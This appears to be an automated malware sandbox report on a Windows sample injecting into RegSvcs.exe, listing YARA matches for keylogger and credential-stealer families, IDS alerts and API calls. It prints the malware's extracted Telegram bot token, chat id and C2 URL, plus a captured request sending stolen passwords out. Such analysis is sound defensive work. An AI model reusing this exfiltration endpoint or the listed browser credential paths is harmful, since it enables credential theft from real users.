2.2.RegSvcs.exe.4066458.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c995:$a1: get_encryptedPassword 0x44ccd:$a1: get_encryptedPassword 0x1c969:$a2: get_encryptedUsername 0x44ca1:$a2: get_encryptedUsername 0x1ca2d:$a3: get_timePasswordChanged 0x44d65:$a3: get_timePasswordChanged 0x1c945:$a4: get_passwordField 0x44c7d:$a4: get_passwordField 0x1c9ab:$a5: set_encryptedPassword 0x44ce3:$a5: set_encryptedPassword 0x1c778:$a7: get_logins 0x44ab0:$a7: get_logins 0x1bcea:$a8: GetOutlookPasswords 0x44022:$a8: GetOutlookPasswords 0x1b1fe:$a9: StartKeylogger 0x43536:$a9: StartKeylogger 0x19c5f:$a10: KeyLoggerEventArgs 0x41f97:$a10: KeyLoggerEventArgs 0x19c2e:$a11: KeyLoggerEventArgsEventHandler 0x41f66:$a11: KeyLoggerEventArgsEventHandler 0x1c84c:$a13: _encryptedPassword
2.2.RegSvcs.exe.4066458.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x210a5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x493dd:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x205a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x488db:$a3: \Google\Chrome\User Data\Default\Login Data 0x208b1:$a4: \Orbitum\User Data\Default\Login Data 0x48be9:$a4: \Orbitum\User Data\Default\Login Data 0x216a9:$a5: \Kometa\User Data\Default\Login Data 0x499e1:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2c20cde.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.2c20cde.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2c20cde.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2c20cde.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2c20cde.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ba7d:$a1: get_encryptedPassword 0x1ba51:$a2: get_encryptedUsername 0x1bb15:$a3: get_timePasswordChanged 0x1ba2d:$a4: get_passwordField 0x1ba93:$a5: set_encryptedPassword 0x1b860:$a7: get_logins 0x1add2:$a8: GetOutlookPasswords 0x1a2e6:$a9: StartKeylogger 0x18d47:$a10: KeyLoggerEventArgs 0x18d16:$a11: KeyLoggerEventArgsEventHandler 0x1b934:$a13: _encryptedPassword
2.2.RegSvcs.exe.2c20cde.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2018d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f68b:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f999:$a4: \Orbitum\User Data\Default\Login Data 0x20791:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2e20ee8.4.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.2e20ee8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2e20ee8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2e20ee8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2e20ee8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c995:$a1: get_encryptedPassword 0x1c969:$a2: get_encryptedUsername 0x1ca2d:$a3: get_timePasswordChanged 0x1c945:$a4: get_passwordField 0x1c9ab:$a5: set_encryptedPassword 0x1c778:$a7: get_logins 0x1bcea:$a8: GetOutlookPasswords 0x1b1fe:$a9: StartKeylogger 0x19c5f:$a10: KeyLoggerEventArgs 0x19c2e:$a11: KeyLoggerEventArgsEventHandler 0x1c84c:$a13: _encryptedPassword
2.2.RegSvcs.exe.2e20ee8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x210a5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x205a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x208b1:$a4: \Orbitum\User Data\Default\Login Data 0x216a9:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.4065570.7.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.4065570.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.4065570.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.4065570.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.4065570.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d87d:$a1: get_encryptedPassword 0x45bb5:$a1: get_encryptedPassword 0x1d851:$a2: get_encryptedUsername 0x45b89:$a2: get_encryptedUsername 0x1d915:$a3: get_timePasswordChanged 0x45c4d:$a3: get_timePasswordChanged 0x1d82d:$a4: get_passwordField 0x45b65:$a4: get_passwordField 0x1d893:$a5: set_encryptedPassword 0x45bcb:$a5: set_encryptedPassword 0x1d660:$a7: get_logins 0x45998:$a7: get_logins 0x1cbd2:$a8: GetOutlookPasswords 0x44f0a:$a8: GetOutlookPasswords 0x1c0e6:$a9: StartKeylogger 0x4441e:$a9: StartKeylogger 0x1ab47:$a10: KeyLoggerEventArgs 0x42e7f:$a10: KeyLoggerEventArgs 0x1ab16:$a11: KeyLoggerEventArgsEventHandler 0x42e4e:$a11: KeyLoggerEventArgsEventHandler 0x1d734:$a13: _encryptedPassword
2.2.RegSvcs.exe.4065570.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21f8d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4a2c5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2148b:$a3: \Google\Chrome\User Data\Default\Login Data 0x497c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x21799:$a4: \Orbitum\User Data\Default\Login Data 0x49ad1:$a4: \Orbitum\User Data\Default\Login Data 0x22591:$a5: \Kometa\User Data\Default\Login Data 0x4a8c9:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.408e790.8.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.408e790.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.408e790.8.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.408e790.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.408e790.8.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ab95:$a1: get_encryptedPassword 0x1ab69:$a2: get_encryptedUsername 0x1ac2d:$a3: get_timePasswordChanged 0x1ab45:$a4: get_passwordField 0x1abab:$a5: set_encryptedPassword 0x1a978:$a7: get_logins 0x19eea:$a8: GetOutlookPasswords 0x193fe:$a9: StartKeylogger 0x17e5f:$a10: KeyLoggerEventArgs 0x17e2e:$a11: KeyLoggerEventArgsEventHandler 0x1aa4c:$a13: _encryptedPassword
2.2.RegSvcs.exe.408e790.8.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f2a5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e7a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1eab1:$a4: \Orbitum\User Data\Default\Login Data 0x1f8a9:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2c20cde.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.2c20cde.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2c20cde.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2c20cde.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2c20cde.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d87d:$a1: get_encryptedPassword 0x1d851:$a2: get_encryptedUsername 0x1d915:$a3: get_timePasswordChanged 0x1d82d:$a4: get_passwordField 0x1d893:$a5: set_encryptedPassword 0x1d660:$a7: get_logins 0x1cbd2:$a8: GetOutlookPasswords 0x1c0e6:$a9: StartKeylogger 0x1ab47:$a10: KeyLoggerEventArgs 0x1ab16:$a11: KeyLoggerEventArgsEventHandler 0x1d734:$a13: _encryptedPassword
2.2.RegSvcs.exe.2c20cde.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21f8d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2148b:$a3: \Google\Chrome\User Data\Default\Login Data 0x21799:$a4: \Orbitum\User Data\Default\Login Data 0x22591:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2e20000.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.2e20000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2e20000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2e20000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2e20000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ba7d:$a1: get_encryptedPassword 0x1ba51:$a2: get_encryptedUsername 0x1bb15:$a3: get_timePasswordChanged 0x1ba2d:$a4: get_passwordField 0x1ba93:$a5: set_encryptedPassword 0x1b860:$a7: get_logins 0x1add2:$a8: GetOutlookPasswords 0x1a2e6:$a9: StartKeylogger 0x18d47:$a10: KeyLoggerEventArgs 0x18d16:$a11: KeyLoggerEventArgsEventHandler 0x1b934:$a13: _encryptedPassword
2.2.RegSvcs.exe.2e20000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2018d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f68b:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f999:$a4: \Orbitum\User Data\Default\Login Data 0x20791:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2e20000.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.2e20000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2e20000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2e20000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2e20000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d87d:$a1: get_encryptedPassword 0x1d851:$a2: get_encryptedUsername 0x1d915:$a3: get_timePasswordChanged 0x1d82d:$a4: get_passwordField 0x1d893:$a5: set_encryptedPassword 0x1d660:$a7: get_logins 0x1cbd2:$a8: GetOutlookPasswords 0x1c0e6:$a9: StartKeylogger 0x1ab47:$a10: KeyLoggerEventArgs 0x1ab16:$a11: KeyLoggerEventArgsEventHandler 0x1d734:$a13: _encryptedPassword
2.2.RegSvcs.exe.2e20000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21f8d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2148b:$a3: \Google\Chrome\User Data\Default\Login Data 0x21799:$a4: \Orbitum\User Data\Default\Login Data 0x22591:$a5: \Kometa\User Data\Default\Login Data
Click to see the 94 entries

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T09:37:11.456927+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49705	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T09:37:03.872616+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	158.101.44.242	80	TCP
2025-01-11T09:37:10.342161+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	158.101.44.242	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T09:37:11.035720+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49705	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk", "Telegram Chatid": "1437092720"}
Source: RegSvcs.exe.5596.2.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendMessage"}

Multi AV Scanner detection for submitted file

Source: nfKqna8HuC.exe	Virustotal: Detection: 56%			Perma Link
Source: nfKqna8HuC.exe	ReversingLabs: Detection: 83%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: nfKqna8HuC.exe

Joe Sandbox ML: detected

Source: nfKqna8HuC.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: nfKqna8HuC.exe, 00000000.00000003.2055618022.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, nfKqna8HuC.exe, 00000000.00000003.2056531512.0000000003B70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: nfKqna8HuC.exe, 00000000.00000003.2055618022.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, nfKqna8HuC.exe, 00000000.00000003.2056531512.0000000003B70000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00666CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00666CA9
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_006660DD
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_006663F9
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0066EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0066EB60
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0066F56F FindFirstFileW,FindClose,	0_2_0066F56F
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0066F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0066F5FA
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00671B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00671B2F
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00671C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00671C8A
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00671F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00671F94

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_02A3E190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 03029021h	2_2_03028D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 03029775h	2_2_03029348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 03029775h	2_2_030296A3

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49705 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49705 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

HTTP traffic detected: POST /bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437092720&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f13a4ccec0Host: api.telegram.orgContent-Length: 1077Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: checkip.dyndns.org

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 158.101.44.242:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_00674EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00674EB5

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

Source: RegSvcs.exe, 00000002.00000002.3303484774.000000000326A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.3303484774.000000000314C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.0000000003140000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.000000000314C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.3303484774.00000000030C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.3303484774.00000000030C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437
Source: RegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.000000000314C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_00676B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00676B0C

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_00676D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00676D07

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

0_2_00676B0C

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_00662B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00662B37

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0068F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0068F7FF

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.nfKqna8HuC.exe.1ff0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
